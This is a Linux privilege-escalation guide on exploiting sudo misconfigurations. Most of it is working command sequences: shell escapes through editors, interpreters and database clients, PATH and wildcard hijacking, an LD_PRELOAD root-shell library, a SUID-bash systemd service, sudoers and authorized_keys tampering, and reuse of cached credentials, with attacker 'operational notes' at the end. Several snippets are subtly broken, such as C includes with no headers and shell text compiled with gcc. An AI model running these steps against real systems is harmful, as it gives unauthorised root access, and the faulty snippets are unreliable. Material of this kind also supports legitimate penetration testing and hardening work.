# Sudo misconfigurations ## Understanding Sudo Exploitation #### What Makes Sudo Vulnerable Sudo (substitute user do) allows users to execute commands as other users, typically root. Misconfigurations in sudo rules create direct privilege escalation paths by allowing users to run commands or programs with elevated privileges that can be abused to gain shell access or modify system files. **The Attack Principle**: Exploit sudo rules that: * Allow execution of programs that can spawn shells * Permit command execution with wildcards or path manipulation * Grant access to editors, interpreters, or system utilities * Have overly permissive NOPASSWD configurations * Use environment variable preservation that can be exploited **Why This Works**: Sudo runs commands with the target user's privileges (usually root), so any command that can be manipulated to execute arbitrary code provides immediate privilege escalation. ## Sudo Configuration Discovery #### Basic Sudo Enumeration **Current User Sudo Rights:** ```bash # Check current user's sudo permissions sudo -l # Check specific user sudo permissions sudo -l -U username # Check without password prompt (if NOPASSWD configured) sudo -n -l 2>/dev/null # Test if user can run sudo without password sudo -n true 2>/dev/null && echo "Passwordless sudo available" ``` **Sudo Configuration Files:** ```bash # Main sudo configuration cat /etc/sudoers # Additional sudo configuration files find /etc/sudoers.d/ -type f -exec cat {} \; 2>/dev/null ls -la /etc/sudoers.d/ # Check for backup or temporary sudoers files find /etc -name "*sudo*" -type f 2>/dev/null find /tmp -name "*sudo*" -type f 2>/dev/null ``` **Sudo Version and Capabilities:** ```bash # Check sudo version for known vulnerabilities sudo --version sudo -V # Check for interesting sudo features sudo --help | grep -E "(preserve|env|edit)" ``` ## Binary Exploitation via Sudo #### Understanding Binary Exploitation Patterns As covered in the SUID/SGID section, certain binaries have inherent functionality that can be abused for privilege escalation. The same exploitation principles apply to sudo-allowed binaries - if a binary can spawn shells, execute commands, or manipulate files when run as SUID, it can do the same when executed via sudo. **Key Concept**: The exploitation techniques for sudo-allowed binaries mirror those used for SUID binaries. The difference is the execution method (sudo vs SUID bit), but the underlying abuse mechanisms remain identical. **Example Binary Exploitation via Sudo:** ```bash # If sudo allows vim (same technique as SUID vim) sudo vim # In vim, type: :!/bin/bash # If sudo allows python (same technique as SUID python) sudo python -c 'import os; os.system("/bin/bash")' # If sudo allows find (same technique as SUID find) sudo find /etc -name "passwd" -exec /bin/bash \; ``` For detailed binary exploitation techniques, refer to the comprehensive examples in the SUID/SGID Binary Exploitation section. *** ## Advanced Sudo Exploitation Techniques #### Why Multiple Attack Methods Exist Different sudo configurations require different exploitation approaches. Understanding when and why to use each method is crucial: **Path Manipulation** - Used when sudo rules don't specify absolute paths * **When**: Sudo rule like `user ALL=(ALL) ls` instead of `/bin/ls` * **Why**: You can create malicious binaries with same names in your PATH * **Example**: Create `/tmp/ls` that spawns shell, modify PATH, run `sudo ls` **Wildcard Exploitation** - Used when sudo rules contain wildcards or glob patterns * **When**: Sudo rule like `user ALL=(ALL) /bin/cp /home/user/* /root/` * **Why**: Wildcards expand to include malicious filenames you create * **Example**: Create files named `--preserve=mode` to inject cp flags **Environment Variable Exploitation** - Used when sudo preserves dangerous environment variables * **When**: Sudo config has `env_keep` for LD\_PRELOAD, LD\_LIBRARY\_PATH, etc. * **Why**: You can inject malicious libraries or modify program behavior * **Example**: LD\_PRELOAD malicious library that spawns shell on program start #### Wildcard and Path Exploitation **Command with Wildcards:** ```bash # Why this works: Wildcards expand to include filenames you control # When: Sudo rule like "user ALL=(ALL) /bin/cp /home/user/* /root/" # If sudo rule uses wildcards like: user ALL=(ALL) /bin/cp /home/user/* /root/ # Create malicious files with special names that become command flags touch '/tmp/file1' touch '/tmp/--preserve=mode' # This becomes a flag to cp command touch '/tmp/--preserve=ownership' touch '/tmp/--backup=simple' touch '/tmp/--suffix=.bak' # When wildcard expands, it includes your malicious flags sudo /bin/cp /home/user/* /root/ # Becomes: sudo /bin/cp /home/user/file1 /home/user/--preserve=mode /home/user/--backup=simple /root/ ``` **Path Manipulation:** ```bash # Why this works: Sudo rule doesn't specify absolute path to binary # When: Sudo rule like "user ALL=(ALL) ls" instead of "/bin/ls" echo '#!/bin/bash' > /tmp/ls echo '/bin/bash' >> /tmp/ls chmod +x /tmp/ls export PATH=/tmp:$PATH sudo ls # Executes /tmp/ls instead of /bin/ls because PATH is checked first ``` **Relative Path Exploitation:** ```bash # If sudo allows relative paths ln -s /bin/bash ./ls sudo ./ls # Or create malicious script echo '#!/bin/bash' > ./allowed_script echo '/bin/bash' >> ./allowed_script chmod +x ./allowed_script sudo ./allowed_script ``` #### Environment Variable Exploitation **Why Environment Variables Matter**: Some sudo configurations preserve environment variables that can be manipulated to change program behavior or inject malicious code. **LD\_PRELOAD Exploitation:** ```bash # Why this works: LD_PRELOAD forces programs to load your library first # When: sudo preserves LD_PRELOAD (check with: sudo -l | grep LD_PRELOAD) # Check if LD_PRELOAD is preserved sudo -l | grep -E "(env_keep|LD_PRELOAD)" # Create malicious library that spawns shell when any function is called cat > /tmp/shell.c << 'EOF' #include #include #include void _init() { unsetenv("LD_PRELOAD"); setuid(0); system("/bin/bash"); } EOF gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles # Execute any allowed program with LD_PRELOAD - it will load your library and spawn shell sudo LD_PRELOAD=/tmp/shell.so [any_allowed_program] ``` **LD\_LIBRARY\_PATH Exploitation:** ```bash # Check if LD_LIBRARY_PATH is preserved sudo -l | grep LD_LIBRARY_PATH # Create malicious library directory mkdir /tmp/lib cp /lib/x86_64-linux-gnu/libc.so.6 /tmp/lib/ # Modify library or create wrapper library # Then execute with modified library path sudo LD_LIBRARY_PATH=/tmp/lib [allowed_program] ``` **Other Environment Variables:** ```bash # Check what environment variables are preserved sudo -l | grep env_keep # Exploit preserved variables sudo PYTHONPATH=/tmp python -c 'import malicious' sudo PERL5LIB=/tmp perl script.pl ``` #### Editor and Configuration File Exploitation **sudoedit Exploitation:** ```bash # If sudoedit is allowed for specific files EDITOR='vim -c ":!/bin/bash"' sudoedit /etc/hosts EDITOR='nano -T 4 -c "reset; bash 1>&0 2>&0"' sudoedit /etc/hosts # Alternative sudoedit techniques VISUAL='vim -c ":!/bin/bash"' sudoedit /etc/hosts ``` **Configuration File Overwrite:** ```bash # If sudo allows editing configuration files sudo vim /etc/sudoers # Add: username ALL=(ALL) NOPASSWD: ALL sudo nano /etc/passwd # Modify root entry or add new root user sudo vi /root/.ssh/authorized_keys # Add your SSH public key ``` *** ## Specific Sudo Rule Exploitation #### Common Dangerous Sudo Configurations **ALL Commands (Worst Case):** ```bash # If sudoers contains: user ALL=(ALL) ALL sudo su - sudo bash sudo /bin/bash ``` **NOPASSWD Configurations:** ```bash # If NOPASSWD is configured for specific commands # Check with: sudo -l # Examples of dangerous NOPASSWD rules: sudo vim /etc/passwd # If vim NOPASSWD sudo python script.py # If python NOPASSWD sudo /bin/bash # If bash NOPASSWD (obvious) ``` **Service Management Commands:** ```bash # If sudo allows systemctl sudo systemctl status # Type: !/bin/bash # Create malicious service echo '[Service] Type=oneshot ExecStart=/bin/bash -c "chmod +s /bin/bash" [Install] WantedBy=multi-user.target' > /tmp/malicious.service sudo systemctl link /tmp/malicious.service sudo systemctl enable --now malicious.service ``` **Package Management:** ```bash # If sudo allows apt/yum/dnf sudo apt update && sudo apt install vim sudo vim # Now escalate via vim # Using package manager hooks echo 'exec /bin/bash' > /tmp/hook sudo apt -o DPkg::Pre-Install-Pkgs=/tmp/hook install vim # Yum/DNF exploitation sudo yum install vim -y sudo vim # Escalate via installed editor ``` #### Application-Specific Exploitations **Database Sudo Access:** ```bash # If sudo allows mysql sudo mysql -e '\! /bin/bash' sudo mysql mysql> \! bash # PostgreSQL sudo psql postgres=# \! bash ``` **Web Server Commands:** ```bash # If sudo allows apache2/nginx control sudo apache2ctl -f /dev/stdin <<<'LoadModule rewrite_module /tmp/malicious.so' # Using nginx with malicious config echo 'daemon off; master_process off;' > /tmp/nginx.conf sudo nginx -c /tmp/nginx.conf ``` **Compiler Access:** ```bash # If sudo allows gcc/make echo 'exec /bin/bash' > /tmp/shell.c sudo gcc /tmp/shell.c -o /tmp/shell /tmp/shell # Using make echo 'all:; /bin/bash' > /tmp/Makefile sudo make -f /tmp/Makefile ``` *** ## Sudo Rule Bypasses #### Command Injection in Sudo Rules **Injection through Arguments:** ```bash # If sudo rule allows: /bin/cat /var/log/*.log # Try to inject commands sudo /bin/cat '/var/log/../etc/passwd' sudo /bin/cat '/var/log/something.log; /bin/bash; echo .log' ``` **Shell Metacharacter Exploitation:** ```bash # If sudo allows commands with user input sudo /bin/bash -c "echo user_input" # Inject: user_input; /bin/bash # Command substitution sudo /bin/echo $(whoami) # Try: sudo /bin/echo $(/bin/bash) ``` **Argument Confusion:** ```bash # If sudo rule specifies exact arguments # user ALL=(ALL) /usr/bin/find /home -name *.txt # Try variations: sudo /usr/bin/find /home -name "*.txt" -exec /bin/bash \; sudo /usr/bin/find /home -name '*.txt' -exec sh \; ``` #### Script and Wrapper Exploitation **Shell Script Analysis:** ```bash # If sudo allows execution of shell scripts cat /path/to/allowed_script.sh # Look for: # - Relative paths in the script # - User input handling # - Environment variable usage # - System calls without full paths ``` **Script Modification (if writable):** ```bash # If the allowed script is writable echo '/bin/bash' >> /path/to/allowed_script.sh sudo /path/to/allowed_script.sh ``` **Symbolic Link Attacks:** ```bash # If sudo allows specific file operations ln -s /etc/passwd /tmp/allowed_file sudo vim /tmp/allowed_file # Actually edits /etc/passwd ``` *** ## Time-Based and Race Condition Exploits #### Sudo Timestamp Exploitation **Timestamp File Analysis:** ```bash # Check sudo timestamp files ls -la /var/run/sudo/ts/ ls -la /var/lib/sudo/ # If timestamp files are accessible, check timestamps stat /var/run/sudo/ts/username ``` **Session Hijacking:** ```bash # If multiple sessions exist with same user # Check if sudo credentials are cached sudo -n true 2>/dev/null && echo "Sudo cached, no password needed" # Use cached credentials sudo -n /bin/bash ``` ### Key Operational Considerations #### Success Indicators * **Sudo command executes** without password prompt when expected * **Shell access gained** with elevated privileges (check with `id`) * **File access** to previously restricted files * **Command execution** as root or target user #### Common Failure Points * **Password required** for sudo commands * **Restrictive sudo rules** with no exploitable commands * **Commands in sudo rules** don't exist or aren't exploitable * **Environment variables** are properly sanitized #### Operational Notes * **Always check sudo -l first** before attempting exploitation * **Test NOPASSWD configurations** before assuming password is needed * **Verify effective UID** after successful exploitation * **Understand sudo rule syntax** to identify bypasses and edge cases Sudo misconfigurations represent one of the most common and reliable Linux privilege escalation vectors, with numerous exploitation paths available through both intended functionality and configuration bypasses.